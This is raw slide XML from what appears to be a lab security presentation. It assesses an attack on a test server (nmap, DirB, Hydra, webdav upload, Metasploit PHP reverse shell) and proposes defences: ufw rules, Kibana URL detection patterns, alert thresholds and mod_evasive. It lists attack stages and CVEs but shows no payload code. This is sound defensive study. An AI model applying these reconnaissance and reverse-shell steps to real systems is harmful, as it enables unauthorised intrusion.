              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>The remote exploit PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>always sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>a form of POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>as a keep alive with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a 4-byte payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>containing ‘RECV’ every 10 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>As @ 2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> source code is hardcoded to do this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-171450"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/>
              <a:t>When tested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Packetbeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> appears unable to observe either </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>of the above – all I can see is based on port number 4000</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>which is prior knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>An Investment in Firewall packet inspection is required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>NB: I found little that explained how to detect the reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Test Wireshark captures are remarkable for whats missing from frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>To do: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/>
              <a:t>Examine the PHP exploit payload for insight into operation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/>
              <a:t>Research how the exploit uses target machine memory and hides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/>
              <a:t>Pull apart detection rules from the likes of F5 for ideas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/>
              <a:t>And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>sk Brendan @ Monash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  <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pP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Personal pursuit</a:t>
            </a:r>
            <a:endParaRPr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069" y="2611967"/>
            <a:ext cx="2902400" cy="2055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0438" y="2187645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Reverse shell keep alive packets when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TCP port number is known</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41073903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Blocking the Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Scan - nmap</a:t>
            </a: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dirty="0" smtClean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/>
              <a:t>Alert when a single source IP address exceeds 10 different TCP port number connections per second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/>
              <a:t>Alert upon detection of TCP port numbers that are outside of the range used by the organisation (determined by audit)</a:t>
            </a:r>
            <a:endParaRPr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799" y="1604700"/>
            <a:ext cx="4567133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Close server1 TCP if ports not in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lace rules on ports to accept connections from   authorised sources only EG a jumpbox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Employ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 smtClean="0"/>
              <a:t>‘sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ufw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>deny 80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ to block TCP port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>To permit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> and HTTP access from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>jumpbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> only to server1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dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> allow proto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>jumpbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>192.168.1.105 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>80’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Finding the Request for the Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Directory - DirB</a:t>
            </a:r>
            <a:endParaRPr dirty="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Alert and or prevent forbidden URL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An alert setting of ‘threshold = zero’ will alert for every single event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799" y="1604700"/>
            <a:ext cx="4588301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 forbidden URL access at network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GB" dirty="0" smtClean="0"/>
              <a:t>Prevent directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>apache server to not disclose hidden folders or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>directory traversal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r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Alert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>upon detection of packets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>containing the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>url.path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>’ in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kibana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Apache:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mitigant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> exists regarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>LoadModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rewrite_module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>modules/mod_rewrite.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Link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Preventing Brute Force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Attacks - Hydra</a:t>
            </a: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Detect excessive response codes that are not HTTP 200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Thus capturing HTTP response codes including</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>401 unauthorized (EG Hidden)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>403 Access forbidden (EG Logon required)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404 File not found (No Dir or file)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/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Carry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>out a survey and use 3x previous peak for a select time period as the threshold.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Being mindful of false alarms vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>‘low </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>slow’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>living off the land </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>attacks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83734" y="1494633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While Apache possesses user and password brute force counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>measures. It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>has little for brute force directory tree exploration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unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module called ‘evasive’ assists with DOS, DDOS and brute force attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#apt-get install libapache2-mod-evasive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Link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Alert upon detection of access to the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> directory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Threshold = zero to alert upon every instance</a:t>
            </a:r>
            <a:endParaRPr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Limit network access to TCP port 80 on server1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lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Firewall rule to permit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and HTTP from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>only a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>jumpbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> to server1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>‘</a:t>
            </a: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ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> allow proto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> from &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jumpbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&gt; to 192.168.1.105 port 80’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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Layer these with configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or policy for tougher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Test existing user passwords against dictionaries used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>by attackers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Thank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>you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25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988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8976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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Range:192.168.1.0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 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Gateway: 192.168.1.1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/>
              <a:t>#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>  IPv4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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OS: Windows</a:t>
            </a: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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ML-REFVM-684427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b="1" dirty="0" smtClean="0"/>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> IPv4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Unix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Hostname:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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b="1" dirty="0" smtClean="0"/>
              <a:t>#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> IPv4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>192.168.1.100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OS: Unix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b="1" dirty="0" smtClean="0"/>
              <a:t>#4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> IPv4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Hostname:server1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93" y="753637"/>
            <a:ext cx="4896420" cy="4030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330217451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{3B347707-443D-484B-A753-5A811792EB8A}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ending .040D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</a:t>
                      </a:r>
                      <a:b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Hyper V VM facilitator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ending .0412</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Pentest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ending .D5D7</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Hosting the ELK stack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Receiving Packet, Metric and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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Filebeats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streams from server1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ending .040F</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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of attack and source of ELK stack metrics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230827982"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8600649" cy="3508774"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3B347707-443D-484B-A753-5A811792EB8A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="286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6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7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3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responds to ping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TCP ports respond to test</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en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connections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TCP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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ports open to scanning</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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Gather information about: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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="10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IP addresses</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-GB" sz="10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 sz="10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TCP port numbers</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-GB" sz="10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 sz="10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TCP port service software versions</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="10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active reconnaissance step revealing targets, information and touchpoints for exploitation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Precursor to server access and takeover</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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Scanning for Hidden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directories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Discovery of and traversal to, server directories that are not intended for the public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active reconnaissance step that can be combined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with information or credentials sourced elsewhere to obtain access/manipulate a server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combination of a known user name </a:t>
                      </a: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a password dictionary to brute force a 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 or application logon page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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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weaponization</a:t>
                      </a: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step where success provides unauthorized access to applications and functions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 uploads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credentials can be observed on the network and captured for reuse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exploit installation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step </a:t>
                      </a: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credentials can be reused</a:t>
                      </a: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gain access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can be employed to position malicious payloads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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Assessment - contd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582683200"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8362500" cy="3635559"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3B347707-443D-484B-A753-5A811792EB8A}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0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(C2)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Activation of the malicious payload placed on server1 triggers a remote TCP connection back to the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i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pentest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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machine.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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connection can be turned into a remote shell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 Machine takeover. (CIA)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all data and user details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modify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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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deny access to data or the machine</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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3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 TCP port 22  (SSH) version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/>
                      </a:r>
                      <a:b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 CVE-2019-6111CVE-2019-6110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 exploits exist for SSH software version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Enables lateral movement steps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facilitate access, privilege </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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escalation,data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credential extraction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 TCP port 80  (HTTP)version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CVE-2018-1312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Expliot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enables remote access authentication bypass,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no credentials required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lateral movement step</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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facilitates further access, privilege escalation and credential extraction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4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Port Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - nmap</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2972771" y="1481325"/>
            <a:ext cx="2428500" cy="344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Local subnet discovered 192.168.1.0/24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4 x hosts identified on subnet and their open TCP ports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dentification of the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application and version per open TCP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port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 smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> Result for server1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.105 - Ubuntu </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>  22 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> 7.6p1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>  80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>HTTP open Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.4.29</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>  Vulnerabilities exist for those</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>  SSH and Apache versions </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
